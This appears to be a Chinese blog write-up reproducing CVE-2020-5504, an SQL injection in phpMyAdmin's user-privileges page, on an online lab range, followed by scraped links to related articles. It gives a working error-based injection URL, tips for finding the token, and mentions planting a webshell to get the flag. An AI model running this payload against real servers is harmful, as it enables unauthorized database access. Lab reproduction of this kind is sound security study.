phpmyadmin SQL注入 (CVE-2020-5504) 复现
phpmyadmin SQL注入 (CVE-2020-5504)
- phpmyadmin SQL注入 (CVE-2020-5504)
- 0x01 漏洞描述
- 0x02 影响范围
- 0x03 漏洞复现
- 漏洞利用
- 0x04 漏洞修复
所有文章,仅供安全研究与学习之用,后果自负!
phpmyadmin SQL注入 (CVE-2020-5504)
0x01 漏洞描述
phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 路径:/pma/index.php 密码root:123456
0x02 影响范围
Phpmyadmin <= 5.00
Phpmyadmin <= 4.94
0x03 漏洞复现
(1) 根据提示访问靶场
http://vulfocus.fofa.so:46629/pma/index.php
root 123456登录
可以发现很多信息
phpmyadmin 版本为 5.0.0 刚好存在漏洞
漏洞利用
payload
/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=7233732445545a2c2471503b3d287d62&viewing_mode=server
注意一下两点
(1)payload 中的token 从后台页面 ctrl+u 搜索token 找到
或者抓包 直接从请求包中找到
(2)由于该靶场根目录 在phpmyadmin 项目目录 /pma 目录上一级
所以访问
http://vulfocus.fofa.so:51039/pma 目录下 +payload
不能为
http://vulfocus.fofa.so:51039/pma/index.php +payload
会执行失败报错
访问
http://vulfocus.fofa.so:51039/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=7233732445545a2c2471503b3d287d62&viewing_mode=server
报错注入执行成功
登入后台才能执行 sql报错注入, 不知道有什么用。
明明都可以直接执行sql语句啦。。。。
由于在线靶场 目的是获取flag
所以 用 phpmyadmin写马获取flag
参考另一篇文章 phpmyadmin getshe
0x04 漏洞修复
升级至最新版本
phpmyadmin SQL注入 (CVE-2020-5504) 复现相关推荐
- phpcms set inc.php,phpcms V9 sql注入漏洞测试
phpcms V9 版本存在SQL注入漏洞,漏洞复现如下 0x00 以GET方式访问如下链接,得到返回包里mvbpqw_siteid值: http://127.0.0.1/index.php?m=wa ...
- i春秋2020新春公益赛 GYCTF有关SQL注入题复现
0x00 前言 最近这段时间参加过一些CTF在线竞赛,做过一些Web题,发现SQL注入漏洞出现的频率可真高!不过在做题中也get到了一些Web新知识,现在通过题目复现的方式总结一下. 0x01 bla ...
- 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现
漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 影响范围 使用oracle数 ...
- Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)漏洞复现
Drupal < 7.32 "Drupalgeddon" SQL注入漏洞 by ADummy 0x00利用路线 Burpsuite抓包改包->信息被爆出 0x01漏 ...
- 本地搭建靶站进行漏洞复现和防御(SQL注入、文件上传、XSS漏洞的多种形式)
目录 注册登录模块 源码 测试 源码加固 文件上传模块 源码 测试 源码加固 发布动态模块 源码 测试 源码加固 本地搭建靶站进行测试,旨在提高自己的开发能力以及对漏洞的理解. 源码:利用PHP开发具 ...
- kkcms前台sql注入漏洞复现
kkcms前台sql注入漏洞复现 目录 安装kkcms 漏洞复现 安装kkcms 下载kkcms地址: https://github.com/https://github.com/ 浏览器访问主机ip ...
- 关于espcms的sql注入漏洞代码审计复现
最近在看Seay大大的代码审计一书,边看边做一些代码审计的复现. 在讲代码审计思路时,大大用espcms举例挖掘了个sql注入漏洞,现在准备复现一下. 此案例主要是根据关键字回溯,然后得到漏洞. 使用 ...
- espcms5.7.13 sql注入漏洞复现
espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/cont ...
- 宏景eHR SQL注入漏洞复现(CNVD-2023-08743)
0x01 产品简介 宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化.协同化.流程化.战略化需求的软件. 0x02 漏洞概述 宏景eHR 存在SQL注入漏洞,未经过身份认证的 ...
最新文章
- CUDA Samples: Calculate Histogram(atomicAdd)
- java 反射机制_Java反射机制原理探究
- audio 小程序 放大_码code | 小程序新能力释放,人人都能拥有对话机器人
- ERROR 1044 (42000): Access denied for user ''@'localhost' to database
- where in的sql语句按照指定ID进行排序的解决方法
- JSP 中的几种注释
- 【redis】在spring boot2.0中使用redis的StringRedisTemplate 自动注入@Autowired
- python init文件_Python __init__.py 作用详解
- 海量数据库解决方案2011040701
- 传染病SIR模型及蒙特卡洛方法
- 蓝牙配对连接HCI log学习
- python Shapely使用指南详解
- 睡眠 应该用 a加权 c加权_CPA每日一练财管加权平均资本成本的计算
- Pytest测试用例之setup与teardown方法(一)
- python 坐标轴单位标注_matlab坐标轴如何带单位标注?
- Attention注意力机制–原理与应用
- 数据库连接池之自定义连接池(mysql)
- 百度人脸识别测试环境配置教程
- window编译7z
- 电信物联网开放平台NB-IoT商业项目已投产